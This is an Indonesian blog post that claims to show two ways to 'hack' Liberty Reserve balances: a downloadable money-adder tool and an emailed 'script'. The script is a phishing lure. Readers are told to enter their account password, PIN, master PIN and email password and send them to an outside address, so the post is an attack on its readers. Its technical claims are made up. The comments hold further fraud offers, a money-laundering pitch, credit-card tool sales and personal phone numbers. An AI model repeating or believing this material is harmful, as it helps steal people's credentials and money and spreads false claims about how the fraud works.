Liberty Reserve Hacking Money

Cara 1 dengan Software Hack Money Adder Untuk Liberty Reserve.

Saya stumbled atas perangkat canggih ini sementara saya sedang berselancar Website Online Storage, alat ini berjanji untuk bisa mendapat $ 100 dalam liberty reserve Anda acct.Naturally saya ingin tahu jadi saya menggali lebih dalam dan menemukan bahwa itu upload oleh seorang Rusia yang dapat dipercaya adalah seorang hacker yang sudah mahir dibidangnya.

Bagaimana saya berhasil mendownload tool ini "Liberty reserve hacking Tool" sebelum administrator penyimpanan online situs menghapus file dari servers mereka di Australia tidak ada yang menggunakan Liberty reserve setiap orang menggunakan baik web uang, moneybookers atau lainnya dan paling populer PayPal jadi saya membuka Acct Liberty Reserve & mencoba perangkat lunak dan saya menemukan bahwa itu bekerja dengan sempurna.
Berikut adalah beberapa Screenshots dari cara menggunakan software di bawah ini

1.) Buka Software dan ketik Anda LR tidak acct dan password
Software Hack Money Adder Untuk Liberty Reserve
2.) Kemudian Klik Hack Sekarang dan Anda akan melihat.
Liberty Reserve Hacking Tool
3.) Pada Tahap ini ini hanya duduk dan menonton akan menyuntikkan kode hack dan mengirimkan $ Anda 100.
Liberty Reserve Money Adder
Liberty Reserve Hack
4.) Hal ini Selesai dilakukan.
Hack Liberty Reserve
BAGAIMANA CARA BEKERJANYA?
Saya bingung ketika saya menemukan bahwa hal ini benar-benar bekerja, sebagai web developer tampaknya sangat mustahil untuk tidak berbicara dari jenis protokol keamanan situs ini mata uang digital yang digunakan.
Karena sifat ingin tahu saya setelah banyak penelitian saya berhasil menemukan bahwa ia menggunakan celah pada program survei Liberty bulanan Cadangan..

Liberty Reserve
LIBERTY RESERVE PROGRAM BULANAN SURVEY
· Ini menyuntikkan kode ke dalam Server Liberty Reserve,
· Kode ini meyakinkan server bahwa Anda memenangkan uang tunai $ 100 untuk bulan itu,
· Secara otomatis server LR menambahkan $ 100 sampai acct Anda
Cukup lucu bahkan setelah mereka berhenti program survei masih bekerja dengan sempurna.

Tapi itu tidak bekerja dua kali untuk satu acct.

Untuk mendapatkan Alat Lyberty Reserve Money Adder ini Silahkan Download Disini
 
Cara 2 dengan menggunakan Script SEDOT DOLLAR LIBERTYRESERVE GRATIS

SCRIPT SEDOT DOLLAR LIBERTYRESERVE GRATIS


TRICK MENYEDOT REKENING LIBERTY RESERVE MENGGUNAKAN SCRIPT PENYEDOT LIBERTY RESERVE

ANDA MUNGKIN SALAH SEORANG DARI RIBUAN ORANG YANG BENAR-BENAR BERUNTUNG MASUK KE BLOG SEDERHANA INI.

SAYA MENGATAKAN ANDA BERUNTUNG KARENA TIDAK SEMUA ORANG BISA TAHU CARA MENGISI REKENING LIBERTY RESERVE TANPA HARUS MENGELUARKAN MODAL BANYAK.

DAN JUGA TIDAK SEMUA ORANG TAHU CARA MENARIK ISI REKENING LIBERTY RESERVE ORANG LAIN TANPA MENGURANGI SALDO ORANG TERSEBUT DAN JUSTRU BALANCED DARI PERUSAHAAN LIBERTY RESERVE ITU YANG AKAN KITA SEDOT

======================================

PERHATIKAN TRICK GRATIS YANG SAYA BERIKAN INI!!!

======================================

Liberty Reserve merupakan salah satu e-currency yang 100% dibackup oleh U.S. dollars (untuk Account LR-USD), atau oleh Emas (untuk Account LR-gold), dll yang digunakan sebagai alat pembayaran atau alat investasi anda. Liberty Reserve ini terintegrasi dengan suatu metode pembayaran dalam bentuk rekening/account yang beroperasi secara online, Sehingga orang dapat menggunakan Liberty Reserve sebagai pengganti media pembayaran online yang dalam bentuk tunai (uang). Liberty Reserve adalah LEGAL dan memudahkan transaksi di internet.

Tapi apakah anda tahu bahwa sistem keamanan dari situs libertyreserve belum 100% aman???

Kenapa saya bisa bilang seperti itu?

Saya tidak akan berkomentar disini karena saya JUSTRU AKAN MENCARI UANG DENGAN MEMBERIKAN KABAR INI KEPADA PIHAK LIBERTY RESERVE.


Ok sebelum saya memberikan informasi kepada pihak liberty reserve, ada baiknya juga saya memberikan informasi berharga ini GRATIS buat teman-teman pemilik rekening libertyreserve dari Indonesia (KARENA INFORMASI INI HANYA MENGGUNAKAN BAHASA INDONESIA, JADI HANYA ORANG KITA LAH YANG TAHU)

Seperti halnya e-currency lainnya, liberty reserve di lindungi dengan beberapa tembok pengaman rekening pengikutnya atau para membernya berupa PASSWORD, PIN NUMBER (4-5 digit angka), dan MASTER PIN NUMBER (3 digit angka)
Nah, dengan menggunakan informasi yang saya dapat dan trick yang saya berikan ini, kita bisa menjebol sistem keamanan liberty reserve.

Caranya adalah dengan mengirimkan script rahasia ini kepada admin liberty reserve yang memiliki alamat email: autobot.libertyreserve@cybergal.com (ini adalah Salah satu alamat email re-direct yang dimiliki oleh salah satu hacker libertyreserve asal Toronto dan Seattle) dan nanti setelah pihak liberty reserve menerima email ini, pihak liberty reserve akan mengirimkan dana tanpa mereka ketahui ke alamat account liberty reserve kita dengan melewati (excuse away only) alamat account orang lain dan otomatis (auto forwarder) dari alamat account orang itu akan mengirimkan dollarnya ke rekening liberty reserve kita tanpa mengurangi dollar orang tersebut (KITA MEMANFAATKAN KELEMAHAN SISTEM OTOMATIS EMAIL YANG DIMILIKI LIBERTY RESERVE)

Jadi intinya PIHAK LIBERTY RESERVE lah yang kita rugikan bukan account orang lain.

=======================================

BAIKLAH, SEKARANG KITA MULAI SAJA MENYEDOT KEKAYAAN YANG DIMILIKI LIBERTY RESERVE SEBELUM PIHAK LIBERTYRESERVE MEMPERBAIKI SISTEMNYA YANG BENER-BENER BURUK INI !!!

SCRIPT INI SAYA BELI DARI http://devohack.com/ SEHARGA $1500

Mengapa saya mau berbagi dengan anda, karena saya iba dan prihatin dengan anda apalagi anda yang sudah tertipu oleh PROGRAM BISNIS ONLINE yang tidak JELAS HASILNYA

=======================================

ANDA HARUS MENGIRIMKAN EMAIL YANG BERISI SCRIPT DIBAWAH INI KE ALAMAT EMAIL autobot libertyreserve Re-DIRECT LIBERTYRESERVE DENGAN ALAMAT EMAIL: autobot.libertyreserve@cybergal.com SEKALI LAGI ANDA HARUS MENGIRIMKAN KODE SCRIPT INI KEALAMAT EMAIL autobot.libertyreserve@cybergal.com

SUBJECT email: Bot--libertyreserve
ISI email:

content-Type:text/plain

charset=us-ascii

address000%%confirmation0e24.graffiti.com

p38ylec00rm::s%%www.libertyreserve.com%%

U1234567.informsto%%www.libertyreserve.com%%/viewdetails.asp?id?=Uxxxxxxx

start(retrieve>0)

verified(*value==float)

password-LR-anda%%www.libertyreserve.com%%/view-pinnumber.aspid=11111#

searchmsgend24hr

%%www.libertyreserve.com%%/view-masterpin.aspid=222#

email-anda@gmail.com%%passmailverif=?password-email-anda

searchmsgend24hr

send&&idR20034-tsa-0583#

endofmsg

================================================

Silahkan anda copy DAHULU kode script tersebut di atas!!!!

=============================================

Keterangan (dari ke empat belas baris script diatas) yang terpenting adalah script dengan warna merah harus benar-benar anda perhatikan:

Baris pertama jangan coba-coba diganti, maksudnya adalah Agar script ini terbaca sebagai pesan/email berbentuk teks
masih sama seperti baris pertama jangan sampai diganti
Baris ke-tiga berfungsi untuk mengkonfirmasi alamat email kita (jangan diganti atau dirubah)
Baris ke-empat berfungsi untuk masuk ke alamat liberty reserve (jangan diganti atau dirubah)
Baris Ke-lima berisi:

U1234567.informsto%%www.libertyreserve.com%%/viewdetails.asp?id?=Uxxxxxxx, ganti U1234567 dengan nomor account liberty reserve anda, kemudian biarkan Uxxxxxxx seperti itu saja
Baris Ke-enam berisi: start(retrieve>0), ini fungsinya untuk memerintahkan pihak autobot mencari alamat account liberty reserve yang paling tidak secure (paling tidak aman untuk di masuki)- (jangan diganti atau dirubah)
Baris ke-tujuh berisi kode: verified(*value==float), maksudnya bahwa semua data telah berhasil di verifikasi oleh autobot. (jangan diganti atau dirubah)
Baris ke-delapan berisi kode:

password-LR-anda%%www.libertyreserve.com%%/view-pinnumber.aspid=11111#, maksudnya pihak autobot meminta password dan pin anda untuk bisa memverifikasi kebenaran data account libertyreserve anda. GANTI PASSWORD-LR-ANDA DENGAN PASSWORD YANG ANDA GUNAKAN UNTUK MASUK LIBERTY RESERVE, KEMUDIAN GANTI ANGKA 11111 DENGAN NOMOR PIN ANDA (4 ATAU 5 DIGIT), ini dimaksudkan untuk meyakinkan bahwa data anda benar-benar ada dan bukan account FIKTIF.
Baris ke-sembilan berisi kode: searchmsgend24hr, maksudnya adalah pihak autobot akan mencari kebenaran data anda lagi melalui password dan pin number tadi, jadi Password dan Pin anda harus benar-benar nyata bukan palsu.
Baris ke-sepuluh berisi kode:

%%www.libertyreserve.com%%/view-masterpin.aspid=222#, maksudnya adalah pihak autobot sudah berhasil masuk ke situs liberty reserve dan membutuhkan MASTER PIN anda untuk mengecek ulang data kebenaran account anda. GANTI angka 222 dengan nomor MASTER PIN anda (3 digit).
Baris kesebelas berisi kode:

email-anda@gmail.com%%passmailverif=?password-email-anda, maksudnya adalah untuk memudahkan autobot mem-verifikasi email yang masuk ke email anda dari liberty reserve SECARA OTOMATIS. masukkan alamat email anda dengan mengganti email-anda@gmail.com menjadi alamat email anda yang digunakan untuk mendaftar di liberty reserve. kemudian masukkan password email anda dengan mengganti tulisan PASSWORD-EMAIL-ANDA.
Baris ke-duabelas dan seterusnya biarkan seperti apa adanya, jangan diganti apapun karena akan berpengaruh pada keberhasilan misi ini.

===========================================

AGAR MISI KITA BERHASIL, MAKA ANDA HARUS BENAR-BENAR MEMPERHATIKAN KETERANGAN TERSEBUT, DAN MASUKKAN DATA DENGAN BENAR.

=======================================

BIASANYA PIHAK AUTOBOT AKAN SEGERA MEMBALAS EMAIL KITA DALAM 2X24 JAM, APABILA ADA KESALAHAN DATA YANG ANDA MASUKKAN, ANDA AKAN MEMPEROLEH BALASAN DENGAN ISI: PESAN ERROR BERBAHASA INGGRIS
Jika anda menerima balasan email seperti itu, anda harus segera mengirim email berisi script dan mengisi data dengan benar atau autobot akan menganggap anda sebagai SPAM!!!
==============================

Oh IyA, AGAR MISI INI BERHASIL, ACCOUNT LIBERTY RESERVE ANDA TIDAK BOLEH KOSONG, ARTINYA ANDA HARUS MEMILIKI SALDO PALING TIDAK MINIMAL ADALAH SEBESAR $ 5 (LIMA DOLLAR), FUNGSINYA ADALAH AGAR ACCOUNT KITA TIDAK DIANGGAP SEBAGAI ACCOUNT YANG FIKTIF

DAN YANG PALING PENTING!!!!
SEMAKIN BANYAK SALDO YANG ANDA MILIKI MAKA SEMAKIN BESAR JUGA SALDO YANG AKAN BERTAMBAH KEMUDIAN KE DALAM ACCOUNT LIBERTYRESERVE DENGAN PERBANDINGAN 5:50

ARTINYA JIKA ANDA MEMILIKI SALDO $5 MAKA KEMUNGKINAN BESAR ANDA AKAN MEMPEROLEH SEKITAR $50

NAH BAYANGKAN JIKA ANDA MEMILIKI SALDO 100 DOLLAR, MAKA ANDA AKAN MEMPEROLEH SEDIKITNYA 5000 DOLLAR

WOWWWWW....
SAYA SUDAH MEMBUKTIKAN SENDIRI DAN SAMPAI SEKARANG TETAP AMAN MAN....=============================

SELAMAT MENCOBA!!!
SEBELUM PIHAK LIBERTY RESERVE MEMPERBAIKI SISTEMNYA

UPDATE NEWS!!!

KABAR TERAKHIR YANG SAYA TERIMA DARI FORUM, PIHAK LIBERTYRESERVE MULAI MEMPERBAIKI SISTEMNYA SEKITAR BULAN september TAHUN 2012, JADI MASIH ADA BANYAK WAKTU BRO.....
Terima kasih telah membaca artikel tentang Liberty Reserve Hacking Money di blog Downloads Software Gratis jika anda ingin menyebar luaskan artikel ini di mohon untuk mencantumkan link sebagai Sumbernya, dan bila artikel ini bermanfaat silakan bookmark halaman ini di web browser anda, dengan cara menekan Ctrl + D pada tombol keyboard anda.

Artikel terbaru :

41 comments

Hei Bro berhentilah menipu orang, kalau mau cari uang pakai Liberty Reserve silahkan kunjungi situs pemiliknya. Saya sudah coba dan tidak tipu-tipu. Hasilnya nyata WIN or WIN

http://softwarelibertyreservegames.weebly.com/

Balas

iya ini penipuan mending kunjungi http://multihackerteam.blogspot.com/ saya sudah buktikan sendiri dan ada hasilnya ini baru benar2 hacker yang baik hati bukan penipuan...buktikan sajha sendiri, awalnya saya ragu namun begitu ada kontak hp yang dapat dihubungi dan pelayanan yang maksimal saya tidak ragu dan terbukti monggo buktikan ...

Balas

Hai gan kalau ente-ente mau dapat dolar dengan cara kotor dan banyak ikuti cara Saya selama 2 bulan ini dengan bisnis pencucian uang. info lengkap Saya kasih cuma-cuma silahkan email nurhayatina92@gmail.com

Balas

mas nugroho ajha yang terhormat, apakah anda sudah membuktikannya dan mendapatkan uang anda kembali mas? saya ingin meminta no hp admin yang bisa dihubungi, tolong kirimkan melalui email saya mas, dyah.arum92@yahoo.com mungkin kita bisa sharing comment, saya tunggu balasannya, terimakasih....

Balas

gan kalo mau nipu jgn sma org indonesia donk... udh mskin mau nipu kasian donk.. nipu tuh sma org luar indo aja kek amerika zionis

Balas

Dear mas Nugroho ajha
saya sudah membeli salah satu paket di multihackerteam.blogspot.com , namun sudah dua hari belum ada khabar soal roderan saya ,
mungkin mas punya pengalaman soal ini silakan email ke sogleng13mei@yahoo.com
terima kasih mas sebelumnya

Balas

pengalaman dengan multihakerteam, saya sudah pesan dan byar $50 sampai seminggu tidak ada kabar , dan mas yoga ardiansyah adalah hanya hacker gadungan yang pura pura ingin membantu padahal setelah kita lakukan pembayaran dia langsung ngacirr,, dan say good bye ,
dan hati hati dengan siapa pun yang sudah mengaku pernah manggunakan jasanya adalah hanya palsu belaka, kemungkinan dia adalah yoga yoga yang jadi orang lain,uang saya sudah melayang $50.
sekali lagi hati hati , ternyata yoga yg mengaku orang jawa tersebut adalah penipu, saya bener bener malu karena saya juga orang jawa,
mengenai blog www.multihackerteam.blogspot.com adalah blog scam yang ingin mencaplok bangsa kita sendiri, semoga tidak ada lagi korban berikutnya
jika inginkonfirmasi saya silakan email ke aregawok@gmail.com
salam

Balas

wah wah wah mas adi suheni ini pasti salah paham tentang multihackertem dengan admin mas yoga dan web http://multihackerteam.blogspot.com/ saya adalah orang seperti mas nugroho dan mewakili orang yang pernah order ke multihackerteam mereka kerja profesional dan belum pernah ada masalah saya yakin mas adi salah orang jika mengatakan seperti itu jangan fitnah mas kasihan multihackerteam berniat membantu malah difitnah oleh mas,mas ga ngaca apa nama email mas ajha maaf "jorok" seperti itu gimana kami bisa percaya dengan anda,pokoknya bagi yang sedang mencari software dan jasa scamhelper yang terpercaya hanyalah multihackerteam.blogspot.com ga ada yang mas adi yang memfitnah ini salah paham sebenarnya dia menjelek2an multihackerteam karena dia penipu yang pura2 menjual software sejenis dan mengcopy paste materi dari web milik multihackerteam ini web milik adi suheni yang punya email jorok dan mengaku2 hacker http://masterhackerteam.blogspot.com/ jangan pernah percaya dengan cara penipuan seperti yang dilakukan adi suheni ini,untuk mas yoga adminmultihackerteam yang sabar mas semakin tinggi pohon semakin banyak angin yang menerpa yang sabar mas,kami dari pengguna yang banyak dibantu mas yoga akan membantu mas yoga dan memperbaiki nama mas yoga khusunya adminmultihackerteam semangat mas yoga! hendra semarang

Balas

mas heri sogleng saya sudah kirim emailnya mas heri ,dan setelah saya tanyakan ternyata software sudah dikirim sejak 1 hari setelah konfirmasi ke email mas heri yang 1 nya coba dicek dulu mas emailnya hendra semarang

Balas

mas hendra semarang kenapa anda membantu multihackerteam.blogspot.com iya benar saya memang memfitnah terus anda mau apa,kenapa ngatain email saya jorok ga ush sok suci deh!!!ini khan dunia online bebas dong orang mau ngomong apa?! saya memang mengcopypaste masteri dengan web milik saya masterhackerteam.blogspot.com tapi saya menipu untuk orang luar indonesia,saya memang sedang mencari dana untuk membeli software di multihackerteam biarin mas yoga saya fitnah lagian juga dia ga bakal tahu,ga usah ikut ikut deh saya tahu kok kalo multihackerteam kerjanya profesional dan ga menipu tapi lihat ajha nanti setelah banyak orang yang membaca iklan saya di iklan baris gratis pasti itu web milik multihackerteam.blogspot.com tidak akan lagu lagi dan berpindah ke blog saya multihackerteam.blogspot.com hendra +nugroho kalo mau ribut hubungi deh nomer saya di nomer hp 082158179440 saya dah pasang ribuan iklan mau baca iklan saya nih linknya http://iklanpasarpagi.com/bisnis/tentang-multihackerteam.html#respond biar multihackerteam ga sombong saya hanya minta software gratis ajha karena memang saya benar2 butuh kok malah di cuekin email saya dasar yoga asu!multihackerteam asu!!!

Balas

multihackerteam penipu klas brat... jgn pernah percya
sdah sngat bxk korbanx,,, yoga ardiansyah to rahman hamidi norek BNI 0261407938 bgian dr multihackerteam jg n kyakx yoga n rahman hamidi adlh orng yg sma.. sgt pandai merangkai klimat sehingga sngat nampk profesional.

Balas

weleh weleh ente ente jangan ribut dimari dong kasian ama yang punya blog. setau ane produk kayak gini mana ada yang dijual dengan harga murah. emang tempe goreng apa.

Balas

Multihacker penipu.... klw adayg bilang bkn penipu paaalingan yoga sendiri yg xamar tuch,,, bhasax profesional banget.. tp hati2 stlah krim duit yoga pun bilang "salam, siap sodara software akan segera di kirim" pdhl g pernah ada

hati2 gan

Balas

yg nama'y surya aditya ajha, nugroho ajha, yoga nurdiansyah smw'y orang yg sama, mw jd penipu tp bego, ngaku2 hacker lg, goblok bgt, masa iya hacker promosi d blog gratisan :D, mana ada penipu yg mw ksh bukti, coba minta bukti yg ribuan dollar itu....
rahman hamidi skrg sdg d usut oleh kepolisian atas tindakan internet fraud... bodoh, kalo mw nipu jgn k bangsa sendiri sama aja cari mati, kalo mw nipu k orang malaysia tuh ky gw hehe

Balas

jangan pernah tertipu multihackerteam.blogspot.com, jika anda buka blognya pasti anda akan terpancing karena dia menggunakan rasa nasionalisme sebagai tipuan. bagi para hacker yang bisa melacaknya tolong dilacak karena orang-orang seperti inilah yang merusak nama hacker. saya punya bukti transaksinya dan sampek sekarang tak pernah saya menerima softwarenya

Balas

jancokkkk! multihacker asuuuu gw doain semoga ke azab!!

Balas

Multihacker team adalah penipu ,
ane salah satu korbannya ,
Yoga ini tinggalnya di daerah Wonosari Yogyakarta...





Balas

yang merasa hacker coba bobol acount lr hacke rina sebab disitu gudangnya duit

Balas

bener bener sebab menurut bocoran yang ane dapet setiap ari pendapetan dari donatur para pengguna product tersebut kagak kurang dari $100.000

Balas

mahesa : mas apa betul anda pmkai softwarenya slrhackerina itu?

Balas

kalau mau beli beli aja gan, waktu terus berlalu. banyak bertanya ketinggalan dolar he he he. kalau kagak punya duit atau ragu manfaatin aja info yang udah ane kasih.

Balas
This comment has been removed by the author.

mau beli takut kena tipu gan bygin sgede duit 5jt buat beli tuh softwer. kmren ane ktipu ama tu owner multihacker.

Balas

kalau gitu manfaatin info yang ane kasih, kagak pake beli tapi ya ntu ape lu sanggup lawan orang yang masuk daftar FBI karena otaknya he he he

Balas

hati-hati bicaramu gan, coba baca kembali aturan pengguna. penyesalan selalu datang belakangan.

Balas

mbak marcella apa pengguna softwer nya? saya mau beli tp masi ragu2

Balas

kalau mau gabung dengan kita-kita buruan mas tidak usah ragu jangan dengarkan agan mahesa mungkin dia lagi teler.

Balas

mbak tlong sms saya 081216490668 btuh info & sharing2 lbih detil

Balas

Agan agan sekalian ane dapet email dari hacke rina bahwa 4 februari hari ulang tahunnya. jadi die kasih versi unlimited gratis bila mengisi donasi $500. info lanjut silahkan tanya sendiri. buruan sebab kesempatan hanya sampe 4 februari jam 24.00

Balas

beneran nih gan awas yach kalau ente ngebohong gua sumpahin wajah luh ama kayak gambarnya

Balas

Admin kindly send me this tool on ali.waris.sadozai@gmail.com

Balas

jangan suka nipuh wlaupun aman di dunia tp di akhirat bakal di pertanggung jawabkan bisnis yg ril ja dech ngapaen cari uang di internet yg ga jelas mending belajar buat app tw web kn bisa kita jual alangkah baiknya kerja dapet uang dan halal

Balas
This comment has been removed by the author.

Kalo ingin menambah saldo LR dengan cepat bahkan hitungan jam coba cara ini

http://bit.ly/10Eix7B

1 jam bisa dapt $10 instan (bukan Hoax)

Kalo ingin register dulu dan mendapatkan URL referall bisa disini

http://bit.ly/10iXRjB

Balas

Kalo ingin menambah saldo LR dengan cepat bahkan hitungan jam coba cara ini

http://bit.ly/10Eix7B

1 jam bisa dapt $10 instan (bukan Hoax)

Kalo ingin register dulu dan mendapatkan URL referall bisa disini

http://bit.ly/10iXRjB

Balas

makanya kalau beli kaya gue langsung COD ketemu dan transaksi...
gak nyesel gue buang uang segitu, kalau berhasil kaya gue kan mau beli apa aja bisa haha
sesaama orang indonesia tu jangan saling merugikan...
km butuh tool credit card gak COD sama ak disini.. jawa tengah

Balas

butuh tool credit card pm me langsung COD , langsung ajarin cara pakainya. no nipu.. silahkan buktikan....

Balas

Namanya gratis ngapain isi donasi $500?? Goblok apa koplak sampeyan itu??mnding kerja bener coy!!! Nfarep uang dr hacker hadehhhh ..

Balas

Drpd hacking....sini kalahin hasil pendapatan kalian ma gw!! Gw ada ktv & lounge di sby,1 bln 150jt bersih!! Hasil hacking u brp duit??? Dtg ke penthouse sby...disitu ada 5 owner,aku slh satunya!! Kerja broo kerja!!! Jgn mimpi dpt uang jth dr langit!!!! Sadarrr!!!!!

Balas